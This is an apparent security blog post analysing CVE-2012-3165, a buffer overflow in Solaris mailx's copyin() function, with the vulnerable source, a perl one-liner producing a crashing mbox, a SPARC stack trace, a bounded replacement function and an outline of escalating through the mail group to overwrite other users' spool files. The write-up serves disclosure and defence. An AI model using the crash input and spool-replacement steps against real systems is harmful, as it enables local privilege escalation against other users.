2012/10/18
tags: solaris mailx vulnerability CVE-2012-3165
mailx(1) on Solaris 10 and 11 is world-executable, setgid and vulnerable to a buffer overflow bug. Via the mail group a local attacker potentially wins access to the local mail spool (/var/mail) and sendmail(8) configuration. They may then repeat the attack on any user susceptible to using mailx to read from the spool.
The problem occurs in the copyin() function of head.c (cribbed from an old copy of OpenSolaris source):

```c
/*
 * Copy the string on the left into the string on the right
 * and bump the right (reference) string pointer by the length.
 * Thus, dynamically allocate space in the right string, copying
 * the left string into it.
 */
static char *
copyin(
	char src[],
	char **space)
{
	register char *cp, *top;
	register int s;

	s = strlen(src);
	cp = *space;
	top = cp;
	strcpy(cp, src);
	cp += s + 1;
	*space = cp;
	return (top);
}
```
The phrase "dynamically allocate" in the comment is incorrect. No new memory is allocated and therefore the target can be overrun. We can hit this by providing a very long "From" line in a message:

    From AAAAAAAAAAAAA...

like this:

```
mallory@sunos:~$ perl -e 'print "From ".("a"x2048)."\n";' > /tmp/mbox
mallory@sunos:~$ mailx -f /tmp/mbox
Bus Error (core dumped)
mallory@sunos:~$
```
On SPARC this generates SIGBUS with stack:

```
ffbfcee8 setptr+0x49c(41414141, 43530, 0, 1, 0, 1)
ffbff778 setfile+0x510(40c00, 1, 1, 436e8, 44f8c, 43400)
ffbff8e0 main+0xa04(44800, 6d, 46910, 46910, 3f400, 1)
ffbff9c0 _start+0x108(0, 0, 0, 0, 0, 0)
```

here:

```
setptr+0x498: f0 03 a0 64  ld [%sp + 0x64], %i0
setptr+0x49c: ec 06 20 00  ld [%i0], %l6
```

At this point (setptr+0x49c), register %i0 contains:

    %i0 = 0x41414141

whereas it should contain the progname string variable's address ("mailx"). That is, the stack has been clobbered by "AAA...".
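The root cause is that copyin() trusts the caller to have sized the destination for whatever strlen(src) turns out to be. The following is an added illustration (not the Solaris source or its fix) of the same calling convention made bounds-aware: a hypothetical third parameter tracks the room left in the destination region, and an over-long header is rejected instead of written past the end of the buffer. The "From aaaa..." input is constructed inline, mirroring the mbox line above.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Bounded replacement for copyin(). Same contract as the original:
 * copy src into *space, advance *space past the copy, return the start
 * of the copy. The extra `remaining` parameter (hypothetical; not part
 * of mailx) holds the number of bytes still free in the destination,
 * so the copy is refused when the string plus its NUL would not fit.
 */
static char *copyin_bounded(const char *src, char **space, size_t *remaining)
{
    size_t s = strlen(src);

    /* s bytes of text plus one terminating NUL must fit. */
    if (s + 1 > *remaining)
        return NULL;                 /* caller treats this as a bad header */

    char *top = *space;
    memcpy(top, src, s + 1);
    *space += s + 1;
    *remaining -= s + 1;
    return top;
}

/*
 * Simulate setptr() copying a "From <name>" line into a fixed 256-byte
 * header region. The line is constructed here: "From " followed by
 * name_len 'a' characters. Returns 1 if the copy was accepted and the
 * buffer state is consistent, 0 if the line was rejected.
 */
int demo_copy_from_line(size_t name_len)
{
    char headbuf[256];
    char *cp = headbuf;
    size_t left = sizeof headbuf;

    char *line = malloc(5 + name_len + 1);
    if (line == NULL)
        return 0;
    memcpy(line, "From ", 5);
    memset(line + 5, 'a', name_len);
    line[5 + name_len] = '\0';

    char *copied = copyin_bounded(line, &cp, &left);
    int ok = (copied == headbuf
              && strcmp(copied, line) == 0
              && left == sizeof headbuf - (5 + name_len + 1));
    free(line);
    return ok;
}

int main(void)
{
    printf("short From line accepted: %d\n", demo_copy_from_line(20));   /* 1 */
    printf("2048-byte From line accepted: %d\n", demo_copy_from_line(2048)); /* 0 */
    return 0;
}
```

The original copyin() would have written all 2054 bytes of the long line through a 256-byte region and on into whatever sat above it on the stack, which is exactly the 0x41414141 seen in %i0 above; the bounded version returns NULL at the check and leaves the stack untouched.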
The local mail spool typically looks like this:

```
drwxrwxrwt 3 root mail 512 Oct 17 02:03 /var/mail
-rw-rw---- 1 root mail 709 Sep 26 05:54 /var/mail/root
```
If the mail file does not already exist then the attacker can immediately create a malicious file (since the spool is world-writable). Otherwise they can first attack the mail group and then use those privileges to obliterate and replace any existing mail file in order to target individual users or roles, including root.
I checked back through the UNIX archives via Unix Tree to see just how old this bug was. I can trace it right back to BSD 2.79 (and it may be even older). 2.79 was released for the PDP-11 in 1979 making this the oldest bug I've ever found by quite a way.